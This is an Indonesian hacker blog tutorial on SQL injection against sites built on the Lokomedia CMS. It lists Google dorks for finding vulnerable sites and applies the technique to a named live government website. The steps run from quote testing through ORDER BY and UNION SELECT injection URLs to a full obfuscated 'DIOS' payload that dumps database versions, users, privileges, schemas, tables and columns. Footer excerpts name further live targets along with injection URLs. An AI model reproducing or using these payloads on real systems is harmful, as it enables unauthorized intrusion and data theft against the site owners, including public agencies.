Cara sqli method lokomedia

-

 



YO HALO HEKER 
YA BERTEMU LAGI DENGAN SAYA 
./FreedomXploit

YA KALI INI SAYA AKAN MEMBAGIKAN TUORIAL SQLI LOKOMEDIA

Yo gausah basa basi
Lgsung ae ke tutorial nya


Bahan
-Dork
-Hp/komputer-pc
-internet
-rokok kopi
-cewek biar pool
-dh hackbar

Yang pertama Tama ya kalian harus ngedork dahulu
Bisa kalian search di chrome,yandex, google

Ya pokoknya gitu lah

Dork
-inurl:statis-1-profil.html
-inurl:statis-2-profil.html
-inurl:statis-3-strukturorganisasi.html
-intext:lokomedia inurl:statis- ext:html
-intext:lokomedia inurl:kategori- 6 - .html
-intext:lokomedia inurl:semua- ext:html
-inurl:kategori-32-daerah.html site:.com
-intext:copyright by inurl:statis-1 ext:html
-intext:lokomedia inurl:statis- ext:html
-intext:lokomedia inurl:semua- ext:html



Karena gw udah dapet target jadi langsung ae kita eksekusi


Live target:https://bkpsdm.sukabumikab.go.id/


Oke langsung aja kita eksekusi 

Karena di website nya gaada paramnya

Kita tinggal cari yang belakang nya .html

Atau ada ini nya -

Contoh

https://bkpsdm.sukabumikab.go.id/home/statis-8-profil.html


Nah kaya gitu


Tinggal kita tambahin tanda petik di dpan .html

https://bkpsdm.sukabumikab.go.id/home/statis-8-profil'.html

Seperti itu kalo ada yang hilang berarti vuln


Lanjut

Kita tambahkan ini --+- kalo normal tanda petik nya gausah di hapus

https://bkpsdm.sukabumikab.go.id/home/statis-8-profil'--+-.html

Lanjut

Kita cari error nya di nomor berapa

Kita tambahkan order by nya

Kalo kalian pake hackbar biasanya sudah di sediakan ygy

Contoh


https://bkpsdm.sukabumikab.go.id/home/statis-8-profil'ORDER BY 1--+-.html

Sampe error ya atau ada yang hilang ygy

https://bkpsdm.sukabumikab.go.id/home/statis-8-profil'ORDER BY 2--+-.html

https://bkpsdm.sukabumikab.go.id/home/statis-8-profil'ORDER BY 3--+-.html

https://bkpsdm.sukabumikab.go.id/home/statis-8-profil'ORDER BY 4--+-.html

https://bkpsdm.sukabumikab.go.id/home/statis-8-profil'ORDER BY 5--+-.html

https://bkpsdm.sukabumikab.go.id/home/statis-8-profil'ORDER BY 6--+-.html


Di 6 ada yang hilang jadi kita buat union select nya sampe 5 untuk nyari togel nya

Contoh

https://bkpsdm.sukabumikab.go.id/home/statis-8-profil'AND 0 UNION SELECT 1,2,3,4,5--+-.html

Karena togel nya 2 sama 3 jadi kita paste di antara no tsbt


Langsung kita paste kan Dios nya 

Dios yang gw pake

/*!50000cOncat/**Darknet-Haxor**/*/(0x223e273e3c2f7469746c653e,0x3c703e3c62723e3c6120687265663d2223223e3c696d67207469746c653d224841584f5222207372633d2268747470733a2f2f312e62702e626c6f6773706f742e636f6d2f2d756939795f376b6a5a51512f5836356f51356d4d5a34492f41414141414141414144412f45374e7a42316e686270516e314a316d4e474f58335a783857744a537250354177434c63424741735948512f733332302f32303230313131335f3137303032382e706e6722206865696768743d22313530222077696474683d22313530222f3e3c2f613e3c2f703e3c62723e3c666f6e7420636f6c6f723d22726564223e3c623e496e6a656374656420627920,0x2e2f46726565646f6d58706c6f6974,0x3c2f623e3c2f666f6e743e3c62723e3c62723e,0x3c666f6e7420636f6c6f723d22626c7565223e,0x56455253494f4e3a3a20,/*!50000VerSiOn/**Darknet-Haxor**/*/(),0x3c62723e,0x555345523a3a20,/*!50000UsEr/**Darknet-Haxor**/*/(),0x3c62723e,0x44415441424153453a3a20,/*!50000DaTabaSe/**Darknet-Haxor**/*/(),0x3c62723e,0x3c62723e,0x544f54414c2044415441424153453a3a20,0x3c62723e,(SeLECT(@w)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000SeLECT/**Darknet-Haxor**/*/(@w:=0x00) ,(SeLECT(@w)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000InFOrMATIoN_SChEmA/**Darknet-Haxor**/*/.SCheMaTA)/*!50000WhErE/**Darknet-Haxor**/*/(@w)IN(@w:=/*!50000CoNCaT/**Darknet-Haxor**/*/(0x20,@w,0x3c666f6e7420636f6c6f723d22726564223e2d2d2d2d2d2d3e203c2f666f6e743e,/*!50000sCheMa_NaMe/**Darknet-Haxor**/*/,0x3c62723e))))w),0x3c62723e,0x3c62723e,0x555345522050524956494c4547453a3a20,0x3c62723e,(SeLECT(@z)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000SeLECT/**Darknet-Haxor**/*/(@z:=0x00) ,(SeLECT(@z)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000INFOrmATiON_SChEmA/**Darknet-Haxor**/*/.UsER_PRIViLEgES)/*!50000WhERE/**Darknet-Haxor**/*/(@z)IN(@z:=/*!50000CoNCaT/**Darknet-Haxor**/*/(0x20,@z,0x3c666f6e7420636f6c6f723d22726564223e2d2d2d2d2d2d3e203c2f666f6e743e,GrANtEE,0x202d3e20,Is_gRANTaBLE,0x3c62723e))))z),0x3c2f666f6e743e,0x3c62723e,0x3c62723e,0x3c666f6e7420636f6c6f723d22696e6469676f223e3c2d2d2d204441524b4e4554202d204841584f52202d2d2d3e3c2f666f6e743e3c62723e,(selEct(@x)/*!50000fRom/**Darknet-Haxor**/*/(/*!50000sElect/**Darknet-Haxor**/*/(@x:=0x00),(sElect(0)/*!From/**Darknet-Haxor**/*/(/*!50000inforMation_schEma.coLuMns/**Darknet-Haxor**/*/)/*!50000Where/**Darknet-Haxor**/*/(taBle_schema=/*!50000DatAbase/**Darknet-Haxor*/*/())and(0x00)in(@x:=/*!50000coNcat/**Darknet-Haxor**/*/(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e2d2d3e203c2f666f6e743e,0x3c666f6e7420636f6c6f723d22677265656e223e,/*!50000tAble_naMe/**Darknet-Haxor**/*/,0x3c666f6e7420636f6c6f723d22726564223e203a3a203c666f6e7420636f6c6f723d22677265656e223e,/*!50000colUmn_naMe/**Darknet-Haxor**/*/))))x))

Kalo di dh langsung ada ygy

Contoh


https://bkpsdm.sukabumikab.go.id/home/statis-8-profil'AND 0 UNION SELECT 1,2,/*!50000cOncat/**Darknet-Haxor**/*/(0x223e273e3c2f7469746c653e,0x3c703e3c62723e3c6120687265663d2223223e3c696d67207469746c653d224841584f5222207372633d2268747470733a2f2f312e62702e626c6f6773706f742e636f6d2f2d756939795f376b6a5a51512f5836356f51356d4d5a34492f41414141414141414144412f45374e7a42316e686270516e314a316d4e474f58335a783857744a537250354177434c63424741735948512f733332302f32303230313131335f3137303032382e706e6722206865696768743d22313530222077696474683d22313530222f3e3c2f613e3c2f703e3c62723e3c666f6e7420636f6c6f723d22726564223e3c623e496e6a656374656420627920,0x2e2f46726565646f6d58706c6f6974,0x3c2f623e3c2f666f6e743e3c62723e3c62723e,0x3c666f6e7420636f6c6f723d22626c7565223e,0x56455253494f4e3a3a20,/*!50000VerSiOn/**Darknet-Haxor**/*/(),0x3c62723e,0x555345523a3a20,/*!50000UsEr/**Darknet-Haxor**/*/(),0x3c62723e,0x44415441424153453a3a20,/*!50000DaTabaSe/**Darknet-Haxor**/*/(),0x3c62723e,0x3c62723e,0x544f54414c2044415441424153453a3a20,0x3c62723e,(SeLECT(@w)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000SeLECT/**Darknet-Haxor**/*/(@w:=0x00) ,(SeLECT(@w)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000InFOrMATIoN_SChEmA/**Darknet-Haxor**/*/.SCheMaTA)/*!50000WhErE/**Darknet-Haxor**/*/(@w)IN(@w:=/*!50000CoNCaT/**Darknet-Haxor**/*/(0x20,@w,0x3c666f6e7420636f6c6f723d22726564223e2d2d2d2d2d2d3e203c2f666f6e743e,/*!50000sCheMa_NaMe/**Darknet-Haxor**/*/,0x3c62723e))))w),0x3c62723e,0x3c62723e,0x555345522050524956494c4547453a3a20,0x3c62723e,(SeLECT(@z)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000SeLECT/**Darknet-Haxor**/*/(@z:=0x00) ,(SeLECT(@z)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000INFOrmATiON_SChEmA/**Darknet-Haxor**/*/.UsER_PRIViLEgES)/*!50000WhERE/**Darknet-Haxor**/*/(@z)IN(@z:=/*!50000CoNCaT/**Darknet-Haxor**/*/(0x20,@z,0x3c666f6e7420636f6c6f723d22726564223e2d2d2d2d2d2d3e203c2f666f6e743e,GrANtEE,0x202d3e20,Is_gRANTaBLE,0x3c62723e))))z),0x3c2f666f6e743e,0x3c62723e,0x3c62723e,0x3c666f6e7420636f6c6f723d22696e6469676f223e3c2d2d2d204441524b4e4554202d204841584f52202d2d2d3e3c2f666f6e743e3c62723e,(selEct(@x)/*!50000fRom/**Darknet-Haxor**/*/(/*!50000sElect/**Darknet-Haxor**/*/(@x:=0x00),(sElect(0)/*!From/**Darknet-Haxor**/*/(/*!50000inforMation_schEma.coLuMns/**Darknet-Haxor**/*/)/*!50000Where/**Darknet-Haxor**/*/(taBle_schema=/*!50000DatAbase/**Darknet-Haxor*/*/())and(0x00)in(@x:=/*!50000coNcat/**Darknet-Haxor**/*/(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22726564223e2d2d3e203c2f666f6e743e,0x3c666f6e7420636f6c6f723d22677265656e223e,/*!50000tAble_naMe/**Darknet-Haxor**/*/,0x3c666f6e7420636f6c6f723d22726564223e203a3a203c666f6e7420636f6c6f723d22677265656e223e,/*!50000colUmn_naMe/**Darknet-Haxor**/*/))))x)),4,5--+-.html

Nah mudah kan jadi sekian tutorial dari saya bila ada kesalahan saya mohon maaf 

Sampai ketemu lagi di next tutorial





Komentar

Posting Komentar

Postingan populer dari blog ini

CARA SQLI DENGAN DH HACKBAR UNTUK PEMULA

-
Gambar
  Halo ker apa kabarnya baik pastinya Awgawgawg Baiklah kaga usah Basa basi langsung aja ke tutorialnya Baiklah bahan bahan yang di butuhkan Bahan bahan -apk dh -web vuln sqli -dios yang pasti nya -bh janda canda awgawgawg  >_< -rokok ama kopi biar mantep -komputer, laptop, atau hp Baiklah langsung saja ke tutorialnya apk dh cukup kalian download di google buat aja dh hackbar nah udah Karena gw udah punya web vuln nya ni gw kasih target nya di bawah Live Target: https://www.tsu.ac.th/ Baik lah ini tampilan awal dh hackbar Nah itu tampilan utama dh Hackbar Kan tadi di atas gw ngasih target tanpa Pram untuk mencari Pram cukup di chrome browser Caranya  Buka chrome trusss  Buat  Site:https://www.tsu.ac.th/ php?id= Nah gitu terkadang ada website yang kaga ada pramnya klo di cari kek gitu Tinggal di search aja di chrome atau browser di yandex juga bisa awgawgawg Klo udah di search nanti jadi gini Nah kalian pilih aja bagi kalian klo di kasih ' klo vuln ya kalia...
Baca selengkapnya

CARA SQLI DENGAN MUDAH

-
Gambar
YOYO THE FUCK Halo lammer apa kabarnya baik pasti nya sakit  Ga canda awgawg Nah kali ini gw bakalan ngasih tau cara sqli biar kalian ga susah payah pass di ajak war sqli  tinggal bales aja skill mentok sqli aja bangga nah pasti baperan dia awgawg  Ok langsung saja bahan bahan nya -Target vuln -kopi rokok biar mantep -cewek kalo punya -kutang janda:v Target live: https://kansascitynova.org/news.php?id=42 Nah langsung aja ke tutorial nya  Pertama tama cek dulu vuln oa kagak tinggal tambahin ' nah mudah kan Contoh: https://kansascitynova.org/news.php?id=42' Kalo vuln ada bacaan error sql syntaq syntaq gituuu yaa  Langsung saja ke tahap ke2 https://kansascitynova.org/news.php?id=42'+order+by+1--+- https://kansascitynova.org/news.php?id=42'+order+by+2--+- Seterusnya sampe 100 aja boleh kalo error Sampai error  Tahap ke 3 Kita cari togel nya oke https://kansascitynova.org/news.php?id=-42'+union+select+1,2,3,4,5,6,7--+- Error nya sampe 7 nah buat sepe...
Baca selengkapnya